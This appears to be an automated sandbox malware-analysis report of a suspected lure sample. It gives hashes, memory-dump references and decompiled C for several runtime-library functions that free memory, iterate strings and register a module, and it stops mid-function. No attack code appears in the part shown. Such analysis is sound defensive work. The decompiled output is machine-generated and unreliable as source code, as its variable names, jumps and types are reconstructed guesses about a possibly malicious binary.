0x00ea25ed
0x00ea25ef
0x00ea25f5
0x00ea25f7
0x00ea25f9
0x00ea25ff
0x00ea2600
0x00ea2602
0x00ea2605
0x00ea2605
0x00ea261f
0x00ea2625
0x00ea262b
0x00ea25f1
0x00ea25f1
0x00ea2631
0x00ea2631
0x00ea2631
0x00ea25ef
0x00ea2638
0x00ea263a
0x00ea2646
0x00ea2646
0x00ea28d0
0x00ea28d0
0x00ea28d2
0x00000000
0x00ea28d4
0x00ea28d6
0x00ea28d6
0x00ea28d2
0x00ea2525
0x00ea251a
0x00ea2510
0x00ea2507
0x00ea24ce
0x00ea24ce
0x00ea24ce
0x00ea24cc
0x00ea2900
0x00ea2908
0x00ea2909
0x00ea290a
0x00ea2916

APIs

Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA235A
Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA236A
Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA2379
Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA2383
Part of subcall function 00EA2327: CharNextA.USER32(?,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA23D5

Part of subcall function 00EA21F6: lstrcmpiA.KERNEL32(?,00EB5EBC,?,00000000,00000000,00EA24CA,?,64E1D101,?,00000000,?,?,?,00EB088D,000000FF), ref: 00EA2209

_strlen.LIBCMT ref: 00EA2532
CharNextA.USER32(00000000,?,?,64E1D101,?,00000000,?,?,?,00EB088D,000000FF,?,00EA3194,?,00000000,?), ref: 00EA25A2
CharNextA.USER32(00000000,?,00EA3194,?,00000000,?,?,?,?,0002001F), ref: 00EA25B7

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: CharNext$_strlenlstrcmpi
String ID:
API String ID: 214070177-0
Opcode ID: f7ed691f32e3f9fc919f668c07db7789fd707be11cbc210e3ff5308c3d2b8350
Instruction ID: 0d6955338280d0880d5a8ba42ea1daf6ed9ac3fe42c419f15c3f1eaff8696ecc
Opcode Fuzzy Hash: f7ed691f32e3f9fc919f668c07db7789fd707be11cbc210e3ff5308c3d2b8350
Instruction Fuzzy Hash: 97D1B371D00269ABDB288B28CC416EAB7F4AF4E314F1010DDFB45BB250D734AE849F90

Uniqueness

Uniqueness Score: -1.00%

Function 00EABFF1 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00EABFF1(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xeb96e8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00EA8B82(_t46);
							E00EABBAA( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00EA8B82(_t47);
							E00EABCA8( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00EA8B82( *((intOrPtr*)(_t74 + 0x7c)));
						E00EA8B82( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00EA8B82( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00EA8B82( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00EA8B82( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00EA8B82( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00EAC162( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xeb91c0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00EA8B82(_t31);
							E00EA8B82( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00EA8B82(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00EA8B82(_t74);
			}

0x00eabff9
0x00eabffd
0x00eac005
0x00eac00e
0x00eac013
0x00eac01a
0x00eac022
0x00eac02a
0x00eac035
0x00eac03b
0x00eac03c
0x00eac044
0x00eac04c
0x00eac057
0x00eac05d
0x00eac061
0x00eac06c
0x00eac072
0x00eac013
0x00eac073
0x00eac07b
0x00eac08e
0x00eac0a1
0x00eac0af
0x00eac0ba
0x00eac0bf
0x00eac0c8
0x00eac0d0
0x00eac0d1
0x00eac0d7
0x00eac0da
0x00eac0dd
0x00eac0e4
0x00eac0e6
0x00eac0ea
0x00eac0f2
0x00eac0f9
0x00eac0ff
0x00eac100
0x00eac100
0x00eac107
0x00eac109
0x00eac10e
0x00eac116
0x00eac11b
0x00eac11c
0x00eac11c
0x00eac11f
0x00eac122
0x00eac125
0x00eac128
0x00eac128
0x00eac138

APIs

___free_lconv_mon.LIBCMT ref: 00EAC035

Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABBC7
Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABBD9
Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABBEB
Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABBFD
Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC0F
Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC21
Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC33
Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC45
Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC57
Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC69
Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC7B
Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC8D
Part of subcall function 00EABBAA: _free.LIBCMT ref: 00EABC9F

_free.LIBCMT ref: 00EAC02A

Part of subcall function 00EA8B82: HeapFree.KERNEL32(00000000,00000000,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?), ref: 00EA8B98
Part of subcall function 00EA8B82: GetLastError.KERNEL32(?,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?,?), ref: 00EA8BAA

_free.LIBCMT ref: 00EAC04C
_free.LIBCMT ref: 00EAC061
_free.LIBCMT ref: 00EAC06C
_free.LIBCMT ref: 00EAC08E
_free.LIBCMT ref: 00EAC0A1
_free.LIBCMT ref: 00EAC0AF
_free.LIBCMT ref: 00EAC0BA
_free.LIBCMT ref: 00EAC0F2
_free.LIBCMT ref: 00EAC0F9
_free.LIBCMT ref: 00EAC116
_free.LIBCMT ref: 00EAC12E

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: f584ab8ce9276c05ee41e90a1498d94a348a6ccfb3ed3ae06359b18bb8e0dd03
Instruction ID: 98eb31fb1cd3e541cad364dddb07e9702cae30f9d1ffbc6c99baf619744109ae
Opcode Fuzzy Hash: f584ab8ce9276c05ee41e90a1498d94a348a6ccfb3ed3ae06359b18bb8e0dd03
Instruction Fuzzy Hash: DF317A71600600DFEB20AE38D945B5673E8EF2A368F24A519E059FF192DF75BD808720

Uniqueness

Uniqueness Score: -1.00%

Function 00EA8F8C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00EA8F8C(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0xeb2040;
				if(_t68 != 0xeb2040) {
					E00EA8B82(_t68);
					_t36 = _a4;
				}
				E00EA8B82( *((intOrPtr*)(_t36 + 0x3c)));
				E00EA8B82( *((intOrPtr*)(_a4 + 0x30)));
				E00EA8B82( *((intOrPtr*)(_a4 + 0x34)));
				E00EA8B82( *((intOrPtr*)(_a4 + 0x38)));
				E00EA8B82( *((intOrPtr*)(_a4 + 0x28)));
				E00EA8B82( *((intOrPtr*)(_a4 + 0x2c)));
				E00EA8B82( *((intOrPtr*)(_a4 + 0x40)));
				E00EA8B82( *((intOrPtr*)(_a4 + 0x44)));
				E00EA8B82( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E00EA8DB8(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E00EA8E23(_t67, _t72, _t73, _t77);
			}

0x00ea8f8c
0x00ea8f8c
0x00ea8f8c
0x00ea8f91
0x00ea8f97
0x00ea8f99
0x00ea8f9f
0x00ea8fa2
0x00ea8fa7
0x00ea8faa
0x00ea8fae
0x00ea8fb9
0x00ea8fc4
0x00ea8fcf
0x00ea8fda
0x00ea8fe5
0x00ea8ff0
0x00ea8ffb
0x00ea9009
0x00ea9014
0x00ea901c
0x00ea901d
0x00ea9020
0x00ea9026
0x00ea902a
0x00ea902e
0x00ea902f
0x00ea9039
0x00ea903f
0x00ea9040
0x00ea9043
0x00ea9049
0x00ea904d
0x00ea9051
0x00ea9058

APIs

_free.LIBCMT ref: 00EA8FA2

Part of subcall function 00EA8B82: HeapFree.KERNEL32(00000000,00000000,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?), ref: 00EA8B98
Part of subcall function 00EA8B82: GetLastError.KERNEL32(?,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?,?), ref: 00EA8BAA

_free.LIBCMT ref: 00EA8FAE
_free.LIBCMT ref: 00EA8FB9
_free.LIBCMT ref: 00EA8FC4
_free.LIBCMT ref: 00EA8FCF
_free.LIBCMT ref: 00EA8FDA
_free.LIBCMT ref: 00EA8FE5
_free.LIBCMT ref: 00EA8FF0
_free.LIBCMT ref: 00EA8FFB
_free.LIBCMT ref: 00EA9009

Strings

@ , xrefs: 00EA8F99

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: @
API String ID: 776569668-1255205553
Opcode ID: cd3969f1989d8ae587a739a8f4943229d536c9f391fa2887bcb57eda1b97b8f5
Instruction ID: d4730dcc4d1ceb3f34bb8840ed73bac11b310ff171d9e71fe98e575bbe940a63
Opcode Fuzzy Hash: cd3969f1989d8ae587a739a8f4943229d536c9f391fa2887bcb57eda1b97b8f5
Instruction Fuzzy Hash: 1021A4BA900108AFCB01EF94C981DDE7BB9FF19354F0491A6B555AF121DA31EA548B90

Uniqueness

Uniqueness Score: -1.00%

Function 00EA3402 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 263
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00EA3402(struct HINSTANCE__* __ebx, unsigned int __ecx, struct HINSTANCE__* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t62;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t68;
				long _t70;
				unsigned int _t74;
				void* _t75;
				unsigned int _t76;
				unsigned int _t82;
				signed int _t84;
				void* _t85;
				void* _t89;
				unsigned int _t91;
				unsigned int _t98;
				void* _t99;
				unsigned int _t100;
				struct HINSTANCE__* _t101;
				unsigned int _t105;
				unsigned int _t113;
				intOrPtr _t116;
				intOrPtr* _t135;
				void* _t140;
				void* _t141;
				unsigned int _t156;
				unsigned int _t159;
				intOrPtr* _t160;
				unsigned int _t162;
				intOrPtr* _t164;
				unsigned int _t166;
				void* _t167;
				void* _t169;
				void* _t170;
				void* _t172;
				void* _t174;

				_t119 = __ebx;
				_push(0x96c);
				_t62 = E00EB0216(0xeb094b, __ebx, __edi, __esi);
				 *(_t169 - 0x94c) = __edx;
				_t158 = __ecx;
				_t164 =  *((intOrPtr*)(_t169 + 0xc));
				L56();
				 *(_t169 - 4) =  *(_t169 - 4) & 0x00000000;
				_t63 = E00EA10C5(_t62, _t169 - 0x968);
				if(_t63 < 0) {
					L8:
					_t165 = _t63;
					goto L9;
				} else {
					 *((char*)(_t169 - 0x950)) = 1;
					if(_t164 != 0) {
						while(1) {
							_t116 =  *_t164;
							if(_t116 == 0) {
								goto L5;
							}
							_push( *((intOrPtr*)(_t164 + 4)));
							_push(_t116);
							_push(_t169 - 0x978);
							E00EA1A54(_t119, _t158, _t164, __eflags);
							_t164 = _t164 + 8;
						}
					}
					L5:
					_t68 =  *((intOrPtr*)( *_t158 + 0x14))(_t169 - 0x978);
					_t165 = _t68;
					if(_t68 < 0) {
						L9:
						E00EA19FE(_t169 - 0x978, _t158);
						goto L10;
					} else {
						_t166 = 0;
						 *(_t169 - 0x944) = 0;
						_t158 = 0x104;
						 *(_t169 - 4) = 1;
						_t119 =  *0xfe2394; // 0xea0000
						_t70 = GetModuleFileNameA(_t119, _t169 - 0x114, 0x104);
						if(_t70 != 0) {
							__eflags = _t70 - 0x104;
							if(_t70 != 0x104) {
								 *(_t169 - 0x940) = E00EA74D0(_t169 - 0x114) + 1;
								_t74 = E00EA1181(_t169 - 0x940, E00EA74D0(_t169 - 0x114) + 1);
								_t172 = _t170 + 4;
								__eflags = _t74;
								if(_t74 < 0) {
									L21:
									_t165 = 0x8007000e;
									goto L9;
								} else {
									_t159 =  *(_t169 - 0x940);
									__eflags = _t159 - 0x400;
									if(__eflags > 0) {
										L17:
										_t75 = E00EA3CD7(_t169 - 0x944, _t166, _t159);
										_t166 =  *(_t169 - 0x944);
									} else {
										_t113 = E00EA11AE(_t119, _t159, _t159, 0, __eflags);
										__eflags = _t113;
										if(_t113 == 0) {
											goto L17;
										} else {
											E00EB02F0(_t159);
											_t75 = _t172;
										}
									}
									_t158 = _t159 >> 1;
									_t76 = E00EA121E(_t75, _t169 - 0x114, _t159 >> 1, 3);
									 *(_t169 - 0x948) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										E00EA14EE(_t169 - 0x93c, _t76);
										__eflags = _t119;
										if(_t119 == 0) {
											L25:
											_t158 = 0x22;
											 *(_t169 - 0x52c) = _t158;
											_t82 = E00EA1105(_t169 - 0x52a, 0x416, _t169 - 0x93c, 2 + E00EA75E7(_t169 - 0x93c) * 2);
											_t172 = _t172 + 0xc;
											__eflags = _t82;
											if(_t82 == 0) {
												_t84 = E00EA75E7(_t169 - 0x52c);
												_pop(_t135);
												 *(_t169 + _t84 * 2 - 0x52c) = _t158;
												_t85 = 2 + _t84 * 2;
												__eflags = _t85 - 0x418;
												if(_t85 >= 0x418) {
													E00EA43FC();
													asm("int3");
													_push(_t119);
													_push(_t166);
													_push(_t158);
													_t160 = _t135;
													__eflags = 0;
													 *_t160 = 0xeb6168;
													_t167 = _t160 + 0x10;
													 *((intOrPtr*)(_t160 + 4)) = 0;
													 *((intOrPtr*)(_t160 + 8)) = 0;
													 *((intOrPtr*)(_t160 + 0xc)) = 0;
													E00EA5210(_t160, _t167, 0, 0x18);
													 *((char*)(_t167 + 0x18)) = 0;
													return _t160;
												} else {
													__eflags = 0;
													 *((short*)(_t169 + _t85 - 0x52c)) = 0;
													_t89 = _t169 - 0x52c;
													goto L31;
												}
											} else {
												__eflags = _t166;
												if(_t166 != 0) {
													do {
														_t158 =  *_t166;
														_t166 = _t158;
														E00EA7188(_t166);
														__eflags = _t158;
													} while (_t158 != 0);
												}
												_t165 = 0x80004005;
												goto L9;
											}
										} else {
											__eflags = _t119 - GetModuleHandleA(0);
											if(__eflags == 0) {
												goto L25;
											} else {
												_t89 = _t169 - 0x93c;
												L31:
												_push(_t89);
												_push(L"Module");
												_push(_t169 - 0x978);
												_t91 = E00EA1A54(_t119, _t158, _t166, __eflags);
												_t122 = _t91;
												__eflags = _t91;
												if(__eflags >= 0) {
													_push(_t169 - 0x93c);
													_push(L"Module_Raw");
													_push(_t169 - 0x978);
													_t119 = E00EA1A54(_t122, _t158, _t166, __eflags);
													__eflags = _t119;
													if(_t119 >= 0) {
														_t119 =  *(_t169 - 0x94c);
														__eflags = _t119;
														if(_t119 == 0) {
															L52:
															__eflags = _t166;
															if(_t166 != 0) {
																do {
																	_t158 =  *_t166;
																	_t166 = _t158;
																	E00EA7188(_t166);
																	__eflags = _t158;
																} while (_t158 != 0);
															}
															goto L21;
														} else {
															 *(_t169 - 0x940) = E00EA74D0(_t119) + 1;
															_t98 = E00EA1181(_t169 - 0x940, E00EA74D0(_t119) + 1);
															_t174 = _t172 + 4;
															__eflags = _t98;
															if(_t98 < 0) {
																goto L52;
															} else {
																_t162 =  *(_t169 - 0x940);
																__eflags = _t162 - 0x400;
																if(__eflags > 0) {
																	L44:
																	_t99 = E00EA3CD7(_t169 - 0x944, _t166, _t162);
																	_t166 =  *(_t169 - 0x944);
																} else {
																	_t105 = E00EA11AE(_t119, _t162, _t162, _t166, __eflags);
																	__eflags = _t105;
																	if(_t105 == 0) {
																		goto L44;
																	} else {
																		E00EB02F0(_t162);
																		_t99 = _t174;
																	}
																}
																_t158 = _t162 >> 1;
																_t140 = _t99;
																_t100 = E00EA121E(_t140, _t119, _t162 >> 1, 3);
																__eflags = _t100;
																if(_t100 == 0) {
																	goto L52;
																} else {
																	__eflags =  *(_t169 + 8);
																	_t156 =  *(_t169 - 0x948);
																	_push(_t140);
																	_push(_t100);
																	_t141 = _t169 - 0x978;
																	if(__eflags == 0) {
																		_t101 = E00EA2049(_t119, _t141, _t156, _t158, _t166, __eflags);
																	} else {
																		_t101 = E00EA1E71(_t119, _t141, _t156, _t158, _t166, __eflags);
																	}
																	_t119 = _t101;
																	__eflags = _t166;
																	if(_t166 != 0) {
																		do {
																			_t158 =  *_t166;
																			_t166 = _t158;
																			E00EA7188(_t166);
																			__eflags = _t158;
																		} while (_t158 != 0);
																	}
																	E00EA19FE(_t169 - 0x978, _t158);
																}
															}
														}
													} else {
														__eflags = _t166;
														if(_t166 != 0) {
															do {
																_t158 =  *_t166;
																_t166 = _t158;
																E00EA7188(_t166);
																__eflags = _t158;
															} while (_t158 != 0);
														}
														goto L34;
													}
												} else {
													__eflags = _t166;
													if(_t166 != 0) {
														do {
															_t158 =  *_t166;
															_t166 = _t158;
															E00EA7188(_t166);
															__eflags = _t158;
														} while (_t158 != 0);
													}
													L34:
													_t165 = _t119;
													goto L9;
												}
												L10:
												return E00EB01C5(_t119, _t158, _t165);
											}
										}
									} else {
										__eflags = _t166;
										if(_t166 != 0) {
											do {
												_t158 =  *_t166;
												_t166 = _t158;
												E00EA7188(_t166);
												__eflags = _t158;
											} while (_t158 != 0);
										}
										goto L21;
									}
								}
							} else {
								_t165 = 0x8007007a;
								goto L9;
							}
						} else {
							_t63 = E00EA12C0();
							goto L8;
						}
					}
				}
			}

0x00ea3402
0x00ea3402
0x00ea340c
0x00ea3411
0x00ea3417
0x00ea3419
0x00ea3422
0x00ea3427
0x00ea3431
0x00ea3438
0x00ea34a3
0x00ea34a3
0x00000000
0x00ea343a
0x00ea343a
0x00ea3443
0x00ea345a
0x00ea345a
0x00ea345e
0x00000000
0x00000000
0x00ea3447
0x00ea344a
0x00ea3451
0x00ea3452
0x00ea3457
0x00ea3457
0x00ea345a
0x00ea3460
0x00ea346b
0x00ea346e
0x00ea3472
0x00ea34a5
0x00ea34ab
0x00000000
0x00ea3474
0x00ea3474
0x00ea3476
0x00ea347c
0x00ea3481
0x00ea3485
0x00ea3494
0x00ea349c
0x00ea34c0
0x00ea34c2
0x00ea34e0
0x00ea34e6
0x00ea34eb
0x00ea34ee
0x00ea34f0
0x00ea3557
0x00ea3557
0x00000000
0x00ea34f2
0x00ea34f2
0x00ea34f8
0x00ea34fe
0x00ea3516
0x00ea351d
0x00ea3522
0x00ea3500
0x00ea3502
0x00ea3507
0x00ea3509
0x00000000
0x00ea350b
0x00ea350d
0x00ea3512
0x00ea3512
0x00ea3509
0x00ea352a
0x00ea3535
0x00ea353a
0x00ea3540
0x00ea3542
0x00ea3568
0x00ea356e
0x00ea3570
0x00ea3589
0x00ea358b
0x00ea3592
0x00ea35b9
0x00ea35be
0x00ea35c1
0x00ea35c3
0x00ea35e9
0x00ea35ee
0x00ea35ef
0x00ea35f7
0x00ea35fe
0x00ea3603
0x00ea375c
0x00ea3761
0x00ea3762
0x00ea3763
0x00ea3764
0x00ea3765
0x00ea3767
0x00ea376c
0x00ea3772
0x00ea3776
0x00ea3779
0x00ea377c
0x00ea377f
0x00ea3787
0x00ea378f
0x00ea3609
0x00ea3609
0x00ea360b
0x00ea3613
0x00000000
0x00ea3613
0x00ea35c5
0x00ea35c5
0x00ea35c7
0x00ea35c9
0x00ea35c9
0x00ea35cc
0x00ea35ce
0x00ea35d4
0x00ea35d4
0x00ea35c9
0x00ea35d8
0x00000000
0x00ea35d8
0x00ea3572
0x00ea357a
0x00ea357c
0x00000000
0x00ea357e
0x00ea357e
0x00ea3619
0x00ea3619
0x00ea361a
0x00ea3625
0x00ea3626
0x00ea362b
0x00ea362d
0x00ea362f
0x00ea3651
0x00ea3652
0x00ea365d
0x00ea3663
0x00ea3665
0x00ea3667
0x00ea367e
0x00ea3684
0x00ea3686
0x00ea3740
0x00ea3740
0x00ea3742
0x00ea3748
0x00ea3748
0x00ea374b
0x00ea374d
0x00ea3753
0x00ea3753
0x00ea3757
0x00000000
0x00ea368c
0x00ea369b
0x00ea36a1
0x00ea36a6
0x00ea36a9
0x00ea36ab
0x00000000
0x00ea36b1
0x00ea36b1
0x00ea36b7
0x00ea36bd
0x00ea36d5
0x00ea36dc
0x00ea36e1
0x00ea36bf
0x00ea36c1
0x00ea36c6
0x00ea36c8
0x00000000
0x00ea36ca
0x00ea36cc
0x00ea36d1
0x00ea36d1
0x00ea36c8
0x00ea36e9
0x00ea36ee
0x00ea36f0
0x00ea36f5
0x00ea36f7
0x00000000
0x00ea36f9
0x00ea36f9
0x00ea36fd
0x00ea3703
0x00ea3704
0x00ea3705
0x00ea370b
0x00ea3714
0x00ea370d
0x00ea370d
0x00ea370d
0x00ea3719
0x00ea371b
0x00ea371d
0x00ea371f
0x00ea371f
0x00ea3722
0x00ea3724
0x00ea372a
0x00ea372a
0x00ea371f
0x00ea3734
0x00ea3739
0x00ea36f7
0x00ea36ab
0x00ea3669
0x00ea3669
0x00ea366b
0x00ea366d
0x00ea366d
0x00ea3670
0x00ea3672
0x00ea3678
0x00ea3678
0x00ea367c
0x00000000
0x00ea366b
0x00ea3631
0x00ea3631
0x00ea3633
0x00ea3635
0x00ea3635
0x00ea3638
0x00ea363a
0x00ea3640
0x00ea3640
0x00ea3635
0x00ea3644
0x00ea3644
0x00000000
0x00ea3644
0x00ea34b2
0x00ea34bd
0x00ea34bd
0x00ea357c
0x00ea3544
0x00ea3544
0x00ea3546
0x00ea3548
0x00ea3548
0x00ea354b
0x00ea354d
0x00ea3553
0x00ea3553
0x00ea3548
0x00000000
0x00ea3546
0x00ea3542
0x00ea34c4
0x00ea34c4
0x00000000
0x00ea34c4
0x00ea349e
0x00ea349e
0x00000000
0x00ea349e
0x00ea349c
0x00ea3472

APIs

__EH_prolog3_GS.LIBCMT ref: 00EA340C

Part of subcall function 00EA10C5: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,?,00EB7488), ref: 00EA10CB
Part of subcall function 00EA10C5: GetLastError.KERNEL32(?,00000000,00000000,?,?,00EB7488), ref: 00EA10D5

GetModuleFileNameA.KERNEL32(00EA0000,?,00000104), ref: 00EA3494
_strlen.LIBCMT ref: 00EA34D2
__alloca_probe_16.LIBCMT ref: 00EA350D
GetModuleHandleA.KERNEL32(00000000,?), ref: 00EA3574
_strlen.LIBCMT ref: 00EA368D
__alloca_probe_16.LIBCMT ref: 00EA36CC

Strings

Module, xrefs: 00EA361A
Module_Raw, xrefs: 00EA3652

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: Module__alloca_probe_16_strlen$CriticalErrorFileH_prolog3_HandleInitializeLastNameSection
String ID: Module$Module_Raw
API String ID: 3573513912-3885325121
Opcode ID: 7cf2019a0424e86e2cabca32ea0cd0a7fa759ff8527d6d5c012a6b7263a69e1e
Instruction ID: 3292c8928d3c7327ce408e31a8a57a57fdd992b945d9d9e1e159c94c2296ade1
Opcode Fuzzy Hash: 7cf2019a0424e86e2cabca32ea0cd0a7fa759ff8527d6d5c012a6b7263a69e1e
Instruction Fuzzy Hash: 05919272E0162857EB21DA748C41BEE72A89F9E324F152195F949BF242DA30FF458B90

Uniqueness

Uniqueness Score: -1.00%

Function 00EA5570 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00EA5570(void* __ebx, void* __ecx, intOrPtr __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				void* _v36;
				void* _v40;
				char* __edi;
				intOrPtr* __esi;
				int _t150;
				signed int _t157;
				intOrPtr _t158;
				void* _t159;
				intOrPtr* _t160;
				intOrPtr _t162;
				void* _t165;
				signed int _t167;
				void _t175;
				void _t176;
				int _t178;
